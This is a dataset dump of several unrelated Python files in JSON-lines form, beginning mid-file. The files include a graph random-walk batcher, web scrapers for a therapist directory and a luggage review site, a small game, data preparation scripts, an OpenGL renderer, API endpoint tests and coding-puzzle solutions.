batch_size, shuffle=True):\n\n nodes = self.get_nodes(dataset)\n label_len = np.shape(self.all_labels)[1]\n\n # Get position of all walks ending with desired set of nodes\n pos = []\n for node in np.where(nodes)[0]:\n pos.extend(np.where(self.node_seq == node)[0])\n\n pos = np.array(pos)\n if shuffle:\n indices = np.random.permutation(len(pos))\n pos = pos[indices]\n\n if batch_size == -1:\n batch_size = len(pos)\n\n tot = len(pos)//batch_size\n for i in range(0, len(pos), batch_size):\n x = self.all_walks[pos[i: i + batch_size]]\n x = np.swapaxes(x, 0, 1) # convert from (batch x step) to (step x batch)\n\n # get labels for valid data points, for others: select the 0th label\n x2 = [[self.label_cache.get(item, self.all_labels[0]) for item in row] for row in x]\n y = [self.all_labels[item] for item in x[-1]]\n\n # get features for all data points\n x = [[self.all_features[item] for item in row] for row in x]\n\n seq = self.node_seq[pos[i: i + batch_size]]\n\n yield (x, x2, seq, y, tot)\n\n @async_prefetch\n def next_batch_same(self, dataset, node_count=1):\n\n nodes = self.get_nodes(dataset)\n\n pos = []\n counts = []\n seq = []\n for node in np.where(nodes)[0]:\n temp = np.where(self.node_seq == node)[0]\n counts.append(len(temp))\n seq.append(node)\n pos.extend(temp)\n\n pos = np.array(pos)\n\n start = 0\n max_len = self.all_walks.shape[1]\n # Get a batch of all walks for 'node_count' number of node\n for idx in range(0, len(counts), node_count):\n #print(idx)\n stop = start + np.sum(counts[idx:idx+node_count]) #start + total number of walks to be consiudered this time\n x = self.all_walks[pos[start:stop]] #get the walks corresponding to respective positions\n\n temp = 
np.array(x)>0 #get locations of all zero inputs\n lengths = max_len - np.sum(temp, axis=1)\n\n x = np.swapaxes(x, 0, 1) # convert from (batch x step) to (step x batch)\n\n #\"\"\"\n #original\n # get labels for valid data points, for others: select the 0th label\n x2 = [[self.label_cache.get(item, self.all_labels[0]) for item in row] for row in x]\n y = [self.all_labels[item] for item in x[-1,:]] #Not useful, only presetn for sake of placeholder\n\n # get features for all data points\n x1 = [[self.all_features[item] for item in row] for row in x]\n #\"\"\"\n\n \"\"\"\n #Unique based\n u, inv = np.unique(x, return_inverse=True)\n u2, inv2 = np.unique(x[-1:], return_inverse=True)\n x2 = np.array([self.label_cache.get(item, self.all_labels[0]) for item in u])[inv]#.reshape(x.shape)\n x1 = np.array([self.all_features[item] for item in u])[inv]#.reshape(x.shape)\n y = np.array([self.all_labels[item] for item in u2])[inv2]\n \"\"\"\n\n \"\"\"\n # Vectorized\n # get labels for valid data points, for others: select the 0th label\n x2 = np.vectorize(self.label_cache.get)(x)\n x1 = np.vectorize(self.all_features.__getitem__)(x)\n y = np.vectorize(self.all_labels.__getitem__)(x[-1:])\n \"\"\"\n\n start = stop\n yield (x, x1, x2, seq[idx:idx+node_count], counts[idx:idx+node_count], y, lengths)\n\n\n def testPerformance(self):\n\n start = time.time()\n step =0\n for a,b,c,d,e,f,g in self.next_batch_same('all'):\n step += 1\n if step%500 == 0: print(step)\n\n print ('total time: ', time.time()-start)","sub_path":"Sample_Run/Seq_att/blogDWdata.py","file_name":"blogDWdata.py","file_ext":"py","file_size_in_byte":9690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"333736336","text":"from bs4 import BeautifulSoup\nfrom states import states\nimport requests\nimport time\nimport logging\nimport sys\nimport urlparse\n\nBASE_URL = \"https://therapists.psychologytoday.com\"\nRESULTS_URL = BASE_URL + \"/rms/prof_results.php\"\nUSER_AGENT = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36\"\nPAGE_TIMEOUT = 3\n\n\ndef main():\n \"\"\"\n\n :return:\n \"\"\"\n if args.debug:\n log.info(\"Started Psychology Today scraper in debug mode.\")\n params = {'s': 'N'}\n for state_abbr, state in states.iteritems():\n if args.debug:\n log.info(\"Scraping for state: %s\" % state)\n params['state'] = state_abbr\n parse_directory(params)\n\n\ndef parse_directory(params):\n \"\"\"\n\n :param params:\n :return:\n \"\"\"\n has_more_pages = True\n index = 1\n while has_more_pages:\n if args.debug:\n log.info(\"rec_next: %d\" % index)\n params['rec_next'] = str(index)\n has_more_pages = parse_page(params)\n index += 20\n time.sleep(PAGE_TIMEOUT)\n\n\ndef parse_page(params):\n \"\"\"\n\n :param params:\n :return:\n \"\"\"\n try:\n response = requests.get(RESULTS_URL, params=params, headers={'user-agent': USER_AGENT})\n\n soup = BeautifulSoup(response.text, \"html.parser\")\n results = soup.find_all('a', attrs={\"class\": \"result-name\"})\n\n for link in results:\n name = link.span.string\n profid = get_profid(BASE_URL + link.get('href'))\n log.info(\"%s,%s\" % (name, profid))\n\n end_results = soup.find('div', attrs={\"class\": \"endresults-right\"})\n if end_results:\n contents = end_results.find_all('a')\n if len(contents) >= 1:\n return contents[-1].string == \"Next\"\n else:\n return False\n else:\n handle_county_state(soup, params)\n except requests.RequestException as e:\n log.debug(e)\n\n\ndef 
get_profid(link):\n \"\"\"\n\n :param link:\n :return:\n \"\"\"\n parsed_url = urlparse.urlparse(link)\n profid = urlparse.parse_qs(parsed_url.query)['profid'][0]\n return profid.encode('utf-8').strip()\n\n\ndef handle_county_state(soup, params):\n \"\"\"\n\n :param soup:\n :param params:\n :return:\n \"\"\"\n counties = soup.find('div', attrs={\"class\": \"col-xs-4\"})\n if counties:\n names = [county.string for county in counties.find_all('a')]\n for name in names:\n if args.debug:\n log.info(\"Handling county %s in state %s\" % (name, params['state']))\n params['county'] = name\n parse_directory(params)\n del params['county']\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser(description='Scrape https://psychologytoday.com')\n parser.add_argument('-d', '--debug', action='store_true', default=False)\n args = parser.parse_args()\n\n log = logging.getLogger(__name__)\n handler = logging.StreamHandler(sys.stdout)\n if args.debug:\n handler.setFormatter(logging.Formatter('%(asctime)s: %(message)s'))\n else:\n handler.setFormatter(logging.Formatter('%(message)s'))\n handler.setLevel(logging.INFO)\n log.addHandler(handler)\n log.setLevel(logging.INFO)\n\n main()\n","sub_path":"scrape/psychology_today.py","file_name":"psychology_today.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"623621387","text":"import json\nimport os\n\n__author__ = 'colinc'\n\nBASE_DIR = os.path.dirname(os.path.realpath(__file__))\nDB_CONFIG = os.path.join(BASE_DIR, \".db_config\")\n\n\ndef data_dir():\n ddir = os.path.join(BASE_DIR, \"data\")\n if not os.path.exists(ddir):\n os.mkdir(ddir)\n return ddir\n\n\ndef get_db(key):\n return json.loads(open(DB_CONFIG, 'r').read()).get(key, \"\")\n","sub_path":"data_collector/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"215638958","text":"from random import randint\nc = 0\nprint('=-=-=-= Jogo do Par ou Ímpar =-=-=-=')\nwhile True:\n n = int(input('Forneça um número par ou ímpar:'))\n comp = randint(0,20)\n total = n + comp\n pi = ' '\n while pi not in 'PI':\n pi = str(input('Par ou Ímpar? [P/I]: ')).strip().upper()[0]\n print(f'Você jogou {n} e o computador {comp}. Total {total} .', end='')\n print('Deu Par. ' if total % 2 == 0 else 'Deu Ímpar. 
', end='')\n if pi == 'P':\n if total % 2 == 0:\n c+=1\n print('Você venceu!')\n else:\n print('Você perdeu!')\n break\n if pi == 'I':\n if total % 2 == 1:\n c += 1\n print('Você venceu!')\n else:\n print('Você perdeu!')\n break\n print('Tente Novamente...')\nprint(f'Game Over: você venceu {c} vezes!')\n\n","sub_path":"68JogoParÍmpar.py","file_name":"68JogoParÍmpar.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"188539968","text":"import pandas as pd\r\nimport math\r\n\r\nNUM_OF_FEATURE = 16\r\n\r\n#prepare Data\r\ndef EventToDF(Data:pd.DataFrame):\r\n event1 = [0 for i in range(NUM_OF_FEATURE)]\r\n event2 = [0 for i in range(NUM_OF_FEATURE)]\r\n for raw in Data.iterrows():\r\n if raw[1][\"side\"] == 1:\r\n event1[raw[1][\"event_type\"]] += 1\r\n if math.isnan(raw[1][\"event_type2\"]) == False:\r\n event1[int(raw[1][\"event_type2\"])] += 1\r\n else:\r\n event2[raw[1][\"event_type\"]] += 1\r\n if math.isnan(raw[1][\"event_type2\"]) == False:\r\n event2[int(raw[1][\"event_type2\"])] += 1\r\n #print(\"team 1 have event:\\n{}\\nTeam 2 have event:\\n{}\".format(event1,event2))\r\n return event1 + event2\r\n\r\ndef Makeheader(Data):\r\n header = []\r\n header0 = [item for item in Data.head(0)]\r\n header1 = [\"num of events type \" + str(i) + \" for size 1\" for i in range(NUM_OF_FEATURE)]\r\n header2 = [\"num of events type \" + str(i) + \" for size 2\" for i in range(NUM_OF_FEATURE)]\r\n header = header0 + header1 + header2\r\n return header\r\n\r\ndef main():\r\n # read ginf data\r\n Gintdata = pd.read_csv(\"ginf.csv\")\r\n # Making header\r\n header = Makeheader(Gintdata)\r\n # read event data\r\n Eventdata = pd.read_csv(\"events.csv\")\r\n #get the fauture from events\r\n raws = []\r\n #IDs = list(Gintdata[\"id_odsp\"])\r\n for raw in Gintdata.values:\r\n Eventdatatemp = Eventdata[(Eventdata[\"id_odsp\"] == raw[0])] # raw[0] == ID\r\n raws.append(list(raw)+EventToDF(Eventdatatemp))\r\n\r\n res = pd.DataFrame(data=raws, columns=header)\r\n res = res.drop(columns=[\"num of events type 0 for size 1\",\"num of events type 0 for size 2\", \"id_odsp\"])\r\n res.to_csv(\"final data.csv\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"PreData.py","file_name":"PreData.py","file_ext":"py","file_size_in_byte":1767,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"145203460","text":"import sys\nsys.path.append('.')\nimport logging\nfrom src.StdIOTestContainer import StdIOTestContainer as T\n\ndef solve():\n t = int(input().strip())\n for _ in range(t):\n nLine = int(input())\n\n sentenses = \"\"\n for _ in range(nLine):\n sentenses += input()\n \n totalSentense = sentenses.split(\"-\")\n totalSentense = \"\".join([\" \" if not sen else sen for sen in totalSentense])\n\n splited = totalSentense.split(\" \")\n T.info(splited)\n\n ret = list(map(len, splited))\n ret = [x for x in ret if x]\n T.info(ret)\n print(sum(ret) / len(ret))\n\nuser_input = '''\n4\n3\nhello-\nthere-\nworld\n4\na-\n-\n-\nb\n3\ni am ver-\ny sleepy arent-\n you \n1\njong-man rules\n'''\nexpected = '''\n15.000\n1.000\n3.500\n4.000\n'''\n\nT.runningTest(user_input, expected, solve)\n","sub_path":"src/algospot/WordLength.py","file_name":"WordLength.py","file_ext":"py","file_size_in_byte":821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"393618649","text":"# -*- coding: utf8 -*-\n\nimport re\nfrom datetime import 
datetime\n\nfrom urllib import unquote\nfrom scrapy import Request\n\nfrom alascrapy.items import ProductItem, ReviewItem\nfrom alascrapy.spiders.base_spiders.ala_spider import AlaSpider\nfrom alascrapy.lib.generic import date_format\nimport alascrapy.lib.dao.incremental_scraping as incremental_utils\n\n\nclass CarryologySpider(AlaSpider):\n name = 'carryology_com'\n allowed_domains = ['carryology.com']\n start_urls = ['https://www.carryology.com/category/luggage/']\n\n def __init__(self, *args, **kwargs):\n super(CarryologySpider, self).__init__(self, *args, **kwargs)\n self.stored_last_date = incremental_utils.get_latest_pro_review_date(\n self.mysql_manager, self.spider_conf[\"source_id\"])\n if not self.stored_last_date:\n self.stored_last_date = datetime(1970, 1, 1)\n\n def parse(self, response):\n\n review_divs_xpath = \"//div[@id='main']/ul\"\n review_divs = response.xpath(review_divs_xpath)\n\n for review_div in review_divs:\n date_xpath = './li//div[@class=\"meta\"]/text()[2]'\n dates = (review_div.xpath(date_xpath)).getall()\n for date in dates:\n \n r_date = str(date).lstrip(\", \")\n review_date = datetime.strptime(r_date, '%B %d, %Y')\n if review_date > self.stored_last_date:\n review_urls_xpath = \"./li/div/a/@href\"\n review_urls = (review_div.xpath(review_urls_xpath)).getall()\n for review in review_urls:\n yield Request(review, callback=self.parse_review)\n\n last_page=29\n for i in range(2, last_page+1):\n next_page_url = 'https://www.carryology.com/category/luggage/page/'+str(i)\n if next_page_url:\n last_date = self.extract(response.xpath('(//div[@id=\"main\"]/ul/li//div[@class=\"meta\"]/text()[2])[last()]'))\n r_date = str(last_date).lstrip(\", \")\n review_date = datetime.strptime(r_date, '%B %d, %Y')\n if review_date > self.stored_last_date:\n yield Request(next_page_url, callback=self.parse)\n\n def parse_review(self, response):\n\n review_xpaths = {\n \"TestTitle\": \"//meta[@property='og:title']/@content\",\n \"Author\": \"//div[@class='meta']/a/text()\",\n \"TestSummary\": \"//meta[@name='description']/@content\"\n }\n review = self.init_item_by_xpaths(response, \"review\", review_xpaths)\n product = ProductItem()\n if not review['TestSummary']:\n review['TestSummary'] = self.extract(response.xpath(\"//meta[@property='og:description']/@content\"))\n\n test_url = response.url\n internal_source_id = str(test_url).split('/')[4].rstrip('/')\n review['source_internal_id'] = internal_source_id\n product['source_internal_id'] = internal_source_id\n # product name\n title = (review['TestTitle']).encode('utf-8')\n if 'review' in title:\n product_name = title.replace(\" review\", \"\")\n elif 'Review' in title:\n product_name = title.replace(\" Review\", \"\")\n elif 'Video' in title:\n product_name = title.replace(\" Video\", \"\").split(\":\")[0]\n elif ':' in title:\n product_name = str(title).split(\":\")[0]\n else:\n product_name = title\n\n product_name = product_name.replace(\" - Carryology - Exploring better ways to carry\", \"\").replace(\" Video\", \"\").replace(\"Drive By\", \"\").replace(\":\", \"\").replace(\" |\", \"\").replace(\" Carryology\", \"\")\n\n review['ProductName'] = product_name\n product['ProductName'] = product_name\n\n source_test_rating = self.extract(response.xpath(\n \"//div[@class='bar']/span[@class='score']/text()\"))\n if source_test_rating:\n review['SourceTestRating'] = source_test_rating\n review['SourceTestScale'] = '10'\n review['TestUrl'] = test_url\n \n date_str = self.extract(response.xpath(\"//div[@class='meta']/text()[2]\"))\n 
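# the scraped date text begins with a leading ', ' (stripped below) before the '%B %d, %Y' value\n        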
date = str(date_str).lstrip(\", \")\n date_time = date_format(date, \"%B %d, %Y\")\n review['TestDateText'] = date_time\n review['DBaseCategoryName'] = 'PRO'\n\n product['TestUrl'] = test_url\n product['OriginalCategoryName'] = self.extract(response.xpath(\"//div[@class='breadcrumbs']//span/text()\"))\n product['PicURL'] = self.extract(response.xpath('//meta[@property=\"og:image\"]/@content'))\n yield review\n yield product","sub_path":"alascrapy/spiders/carryology_com.py","file_name":"carryology_com.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"528382138","text":"from core import *\nfrom OpenGL.GL import *\nfrom lights import *\n\nclass Renderer(object):\n\n def __init__(self, viewWidth=512, viewHeight=512, clearColor=[0.75,0.75,0.75]):\n\n glEnable(GL_DEPTH_TEST)\n\n # enable transparency\n # glEnable(GL_TEXTURE_2D) # is this even useful?\n # glEnable(GL_ALPHA_TEST) # is this even useful?\n \n # use counterclockwise vertex order on triangles \n # (consistent with the \"right-hand rule\" for vector cross product)\n glFrontFace(GL_CCW)\n \n glEnable(GL_BLEND)\n \n # needed for antialiasing; also need to configure in window settings\n glEnable( GL_MULTISAMPLE ) \n\n # allow setting of point size from vertex shader; needed for point attenuation\n glEnable(GL_VERTEX_PROGRAM_POINT_SIZE) \n glEnable( GL_POINT_SPRITE )\n\n # set default screen dimensions\n self.setViewport(0,0, viewWidth,viewHeight)\n\n self.clearColor = clearColor\n \n self.shadowMapEnabled = False\n \n # define the location/size of the rendered output in the window\n def setViewport(self, left=0, bottom=0, width=512, height=512):\n self.left = left\n self.bottom = bottom\n self.screenWidth = width\n self.screenHeight = height\n \n def setViewportSize(self, width, height):\n # define the location/size of the rendered output in the window\n self.screenWidth = width\n self.screenHeight = height\n\n # color(rgba) used for clearing the screen background\n def setClearColor(self, red, green, blue):\n self.clearColor = [red,green,blue]\n \n def render(self, scene, camera, renderTarget=None, clearColor=True, clearDepth=True):\n\n # shadow rendering pass\n if self.shadowMapEnabled:\n \n # render objects in meshList from light's shadowCamera onto light's shadowMap\n \n # note: at present, only one shadow casting directional light is supported\n shadowCastLightList = scene.getObjectsByFilter( lambda x : isinstance(x, Light) and x.castShadow )\n \n # only store depth data for objects which are set to cast a shadow on other objects\n shadowCastMeshList = scene.getObjectsByFilter( lambda x : isinstance(x, Mesh) and x.castShadow )\n\n for light in shadowCastLightList:\n \n # set render target properties\n glBindFramebuffer(GL_FRAMEBUFFER, light.shadowRenderTarget.framebufferID)\n glViewport(0,0, light.shadowRenderTarget.width, light.shadowRenderTarget.height)\n \n glClearColor(1,0,1,1)\n glClear(GL_COLOR_BUFFER_BIT)\n glClear(GL_DEPTH_BUFFER_BIT)\n \n # activate shader\n shadowProgramID = light.shadowMaterial.shaderProgramID\n glUseProgram( shadowProgramID )\n \n glUniformMatrix4fv( glGetUniformLocation(shadowProgramID, \"projectionMatrix\"), \n 1, GL_TRUE, light.shadowCamera.getProjectionMatrix() )\n \n glUniformMatrix4fv(glGetUniformLocation(shadowProgramID, \"viewMatrix\"), \n 1, GL_TRUE, light.shadowCamera.getViewMatrix() )\n \n for mesh in shadowCastMeshList:\n mesh.render( shaderProgramID = shadowProgramID )\n \n \n # standard 
rendering pass\n \n glClearColor(self.clearColor[0], self.clearColor[1], self.clearColor[2], 1)\n \n # activate render target\n if (renderTarget == None):\n # set render target to window\n glBindFramebuffer(GL_FRAMEBUFFER, 0)\n glViewport(self.left, self.bottom, self.screenWidth, self.screenHeight)\n else:\n # set render target properties\n glBindFramebuffer(GL_FRAMEBUFFER, renderTarget.framebufferID)\n glViewport(0,0, renderTarget.width, renderTarget.height)\n\n # clear specified buffers\n if clearColor:\n glClear(GL_COLOR_BUFFER_BIT)\n if clearDepth:\n glClear(GL_DEPTH_BUFFER_BIT)\n \n \n meshList = scene.getObjectsByFilter( lambda x : isinstance(x, Mesh) )\n lightList = scene.getObjectsByFilter( lambda x : isinstance(x, Light) )\n \n for mesh in meshList: # scene.children:\n\n # activate correct shader program\n ID = mesh.material.shaderProgramID\n glUseProgram( ID ) \n \n # update projection and view matrix uniforms\n projectionMatrixVarID = glGetUniformLocation(ID, \"projectionMatrix\")\n if projectionMatrixVarID != -1:\n glUniformMatrix4fv(projectionMatrixVarID, 1, GL_TRUE, camera.getProjectionMatrix() )\n \n viewMatrixVarID = glGetUniformLocation(ID, \"viewMatrix\")\n if viewMatrixVarID != -1:\n glUniformMatrix4fv(viewMatrixVarID, 1, GL_TRUE, camera.getViewMatrix() )\n\n castShadowVarID = glGetUniformLocation(ID, \"castShadow\")\n if castShadowVarID != -1 and mesh.castShadow:\n glUniform1i( castShadowVarID, 1 )\n\n receiveShadowVarID = glGetUniformLocation(ID, \"receiveShadow\")\n if receiveShadowVarID != -1 and mesh.receiveShadow:\n glUniform1i( receiveShadowVarID, 1 )\n \n # update light data\n lightCount = len(lightList) \n glUniform1i( glGetUniformLocation(ID, \"lightCount\"), lightCount )\n\n # update data for all the lights\n lightIndex = 0\n for light in lightList:\n lightName = \"light\" + str(lightIndex)\n glUniform1i( glGetUniformLocation(ID, lightName+\".isAmbient\"), light.isAmbient )\n glUniform1i( glGetUniformLocation(ID, lightName+\".isDirectional\"), light.isDirectional )\n glUniform1i( glGetUniformLocation(ID, lightName+\".isPoint\"), light.isPoint )\n glUniform3f( glGetUniformLocation(ID, lightName+\".color\"), light.color[0], light.color[1], light.color[2] )\n glUniform1f( glGetUniformLocation(ID, lightName+\".strength\"), light.strength )\n \n position = light.transform.getPosition()\n glUniform3f( glGetUniformLocation(ID, lightName+\".position\"), position[0], position[1], position[2] )\n \n if light.isDirectional == 1:\n direction = light.getDirection()\n glUniform3f( glGetUniformLocation(ID, lightName+\".direction\"), direction[0], direction[1], direction[2] )\n \n # if castShadow, update variables containing shadow-related data\n # note: at present, only one shadow casting directional light is supported\n if light.castShadow:\n glUniformMatrix4fv( glGetUniformLocation(ID, \"shadowLightProjectionMatrix\"), 1, GL_TRUE, light.shadowCamera.getProjectionMatrix() )\n glUniformMatrix4fv( glGetUniformLocation(ID, \"shadowLightViewMatrix\"), 1, GL_TRUE, light.shadowCamera.getViewMatrix() )\n \n glUniform1f( glGetUniformLocation(ID, \"shadowStrength\"), light.shadowStrength )\n glUniform1f( glGetUniformLocation(ID, \"shadowBias\"), light.shadowBias )\n \n direction = light.getDirection()\n glUniform3f( glGetUniformLocation(ID, \"shadowLightDirection\"), direction[0], direction[1], direction[2] )\n \n # send shadow map texture data (slot 0)\n glUniform1i( glGetUniformLocation(ID, \"shadowMap\"), 0 )\n # activate texture slot\n glActiveTexture( GL_TEXTURE0 + 0 )\n # 
associate texture data reference to currently active texture slot\n glBindTexture( GL_TEXTURE_2D, light.shadowRenderTarget.textureID )\n \n lightIndex += 1\n \n # update model matrix, other uniforms, etc.\n # and then call the drawArrays function\n mesh.render( shaderProgramID = mesh.material.shaderProgramID )\n \n","sub_path":"three.py/core/Renderer.py","file_name":"Renderer.py","file_ext":"py","file_size_in_byte":8388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"75338494","text":"from json import dumps\n\nimport os\nfrom flask_testing import TestCase\nfrom werkzeug.exceptions import InternalServerError\n\nfrom tests.eve_testing_tools import EveEndpointTestTools\n\n\nclass TestClientsEndpoint(TestCase, EveEndpointTestTools):\n\n def create_app(self):\n os.environ[\"STAGE\"] = \"PROJECTS_TESTING\"\n settings = \"tests.test_projects.projects_testing_settings\"\n os.environ[\"STAGE_SETTINGS\"] = settings\n try:\n EveEndpointTestTools.__init__(self, extra=[\"clients\"])\n except InternalServerError:\n pass\n\n return self.app\n\n def setUp(self):\n self.app = self.app.test_client()\n self.test_client = {\n \"name\": \"Test Client\",\n \"short\": \"TC1\",\n \"brands\": [\n {\n \"name\": \"Test Client1 - Brand 1\",\n \"short\": \"B11\"\n },\n {\n \"name\": \"Test Client1 - Brand 2\",\n \"short\": \"B12\"\n }\n ]\n }\n\n self.assignees = self.objId_to_list(self.insert_bulk_users())\n\n self.test_client[\"_id\"] = str(self.insert_endpoint_pilot(endpoint=\"clients\", data=self.test_client))\n\n self.test_project = {\n 'no': 1,\n 'name': \"Test Project\",\n 'client': {\n \"_id\": self.test_client[\"_id\"],\n \"name\": self.test_client[\"name\"],\n \"short\": self.test_client[\"short\"]\n },\n\n \"brand\": {\n \"name\": self.test_client[\"brands\"][0][\"name\"],\n \"short\": self.test_client[\"brands\"][0][\"short\"]\n },\n \"target_media\": \"CNM\",\n \"category\": \"AV\",\n \"format\": {\n \"code\": \"MP4H\",\n },\n \"owner\": {\n \"_id\": str(self.pilot_id)\n },\n \"assignees\": self.assignees,\n \"status\": \"Invoiced\",\n }\n\n def tearDown(self):\n self.clean_conf()\n self.clean_db()\n self.clean_dirs()\n\n def test_endpoint_get_projects_pass(self): # also tests root_dir_name hook\n r = self.app.get(\n self.api_url(),\n headers=self.token_header())\n data, code = self.parse_response(r)\n self.assertEqual(code, 200)\n\n def test_endpoint_insert_project_pass(self):\n r = self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(self.test_project))\n data, code = self.parse_response(r)\n self.assertEqual(code, 201)\n self.assertIsNotNone(\n self.get_db().find_one({\"no\": self.test_project[\"no\"]})\n )\n\n def test_endpoint_insert_fail_invalid_field(self):\n del self.test_project[\"target_media\"]\n self.test_project[\"invalid_field\"] = \"CNM\"\n r = self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(self.test_project))\n data, code = self.parse_response(r)\n self.assertEqual(code, 422)\n self.assertIsNone(\n self.get_db().find_one({\"no\": self.test_project[\"no\"]})\n )\n self.assertEqual(data[\"_status\"], \"ERR\")\n self.assertEqual(data[\"_issues\"][\"invalid_field\"], \"unknown field\")\n\n def test_insert_fail_invalid_value(self):\n self.test_project[\"status\"] = 1234\n r = self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(self.test_project))\n data, code = self.parse_response(r)\n self.assertEqual(code, 422)\n self.assertIsNone(\n self.get_db().find_one({\"no\": 
self.test_project[\"no\"]})\n )\n self.assertEqual(data[\"_status\"], \"ERR\")\n self.assertEqual(data[\"_issues\"][\"status\"], \"must be of string type\")\n\n def test_endpoint_protected_fail(self):\n r = self.app.post(\n self.api_url(),\n headers=self.token_header(token=\"invalid_token\"), data=dumps(self.test_project))\n data, code = self.parse_response(r)\n self.assertEqual(code, 401)\n self.assertIsNone(\n self.get_db().find_one({\"no\": self.test_project[\"no\"]})\n )\n\n def test_endpoint_unique_name_fail(self):\n self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(self.test_project)\n )\n duplicate_project = self.test_project.copy()\n r = self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(duplicate_project)\n )\n data, code = self.parse_response(r)\n self.assertEqual(code, 422)\n self.assertEqual(data[\"_status\"], \"ERR\")\n self.assertEqual(data[\"_issues\"], {'no': \"value '1' is not unique\"})\n\n def test_endpoint_delete_pass(self):\n r = self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(self.test_project))\n data, code = self.parse_response(r)\n _etag = data[\"_etag\"]\n r = self.app.delete(\n self.item_url(data[\"_id\"]),\n headers=self.token_header(item={\"If-Match\": _etag}))\n data, code = self.parse_response(r)\n self.assertEqual(code, 204)\n self.assertIsNone(self.get_db().find_one({\"no\": self.test_project[\"no\"]}))\n\n def test_endpoint_get_additional_lookup_pass(self):\n self.app.post(\n self.api_url(),\n headers=self.token_header(), data=dumps(self.test_project))\n r = self.app.get(\n self.item_url(str(self.test_project[\"no\"])),\n headers=self.token_header())\n data, code = self.parse_response(r)\n self.assertEqual(code, 200)\n self.assertEqual(data[\"no\"], 1)\n\n # TODO\n # def test_endpoint_fs_pass(self):\n # self.app.application.config[\"SUPPRESS_FS\"] = False\n # self.app.post(\n # self.api_url(),\n # headers=self.token_header(), data=dumps(self.test_client))\n # self.assertTrue(self.dir_tester(\n # self.app.application.config[\"clients\"][\"dirs\"],\n # os.path.join(\n # self.app.application.config[\"clients\"][\"storage\"][\"root\"],\n # fs_name_cleaner(self.test_client[\"name\"])\n # )\n # ))\n","sub_path":"tests/test_projects/test_projects.py","file_name":"test_projects.py","file_ext":"py","file_size_in_byte":6316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"110161390","text":"'''\nYou are climbing a staircase. It takes n steps to reach the top.\n\nEach time you can either climb 1 or 2 steps. In how many \ndistinct ways can you climb to the top?\n\n\nExample 1:\n\nInput: n = 2\nOutput: 2\nExplanation: There are two ways to climb to the top.\n1. 1 step + 1 step\n2. 2 steps\n\nExample 2:\n\nInput: n = 3\nOutput: 3\nExplanation: There are three ways to climb to the top.\n1. 1 step + 1 step + 1 step\n2. 1 step + 2 steps\n3. 2 steps + 1 step\n\nExample 3: \n\nn = 4\n1. 1 step + 1 step + 1 step + 1 step\n2. 1 step + 2 steps + 1 step\n3. 2 steps + 1 step + 1 step\n4. 
2 steps + 2 steps\n\n'''\n\nclass Solution:\n    def climbStairs(self, n: int) -> int:\n        s = []\n        # initialise the DP table with n+1 zeros; s[i] counts the distinct ways to reach step i\n        for i in range(0,n+1):\n            s.append(0)\n\n        # preset the first two items\n        s[0] = 1\n        s[1] = 1\n\n        for i in range(2,n+1):\n            s[i] = s[i-1] + s[i-2]\n        return s[n]\n\ns = Solution()\nprint(s.climbStairs(5))\n\n\n\n\n\n\n","sub_path":"leetcode/070_climbing_stairs/stairs.py","file_name":"stairs.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
+{"seq_id":"557019428","text":"class KiwiJuiceEasy:\r\n    def thePouring(self,capacities, bottles, fromId, toId):\r\n        for i in range(len(fromId)):\r\n            tmp = bottles[toId[i]] + bottles[fromId[i]] \r\n# second version's code\r\n            bottles[toId[i]] = min(tmp,capacities[toId[i]])\r\n            bottles[fromId[i]] = tmp - bottles[toId[i]]\r\n            \r\n# this is first version's code\r\n#            if capacities[toId[i]] >= tmp:\r\n#                bottles[toId[i]] = tmp\r\n#                bottles[fromId[i]] = 0\r\n#            else:\r\n#                bottles[toId[i]] = capacities[toId[i]]\r\n#                bottles[fromId[i]] = tmp - capacities[toId[i]]\r\n            \r\n        remains = bottles \r\n        print(remains)\r\n\r\n\r\nkiwi = KiwiJuiceEasy();\r\ncapacities = [700000,800000,900000,1000000]\r\nbottles = [478478,478478,478478,478478]\r\nfromId = [2,3,2,0,1];\r\ntoId = [0,1,1,3,2];\r\n\r\nkiwi.thePouring(capacities, bottles, fromId, toId)","sub_path":"KiwiJuiceEasy/KiwiJuiceEasy.py","file_name":"KiwiJuiceEasy.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
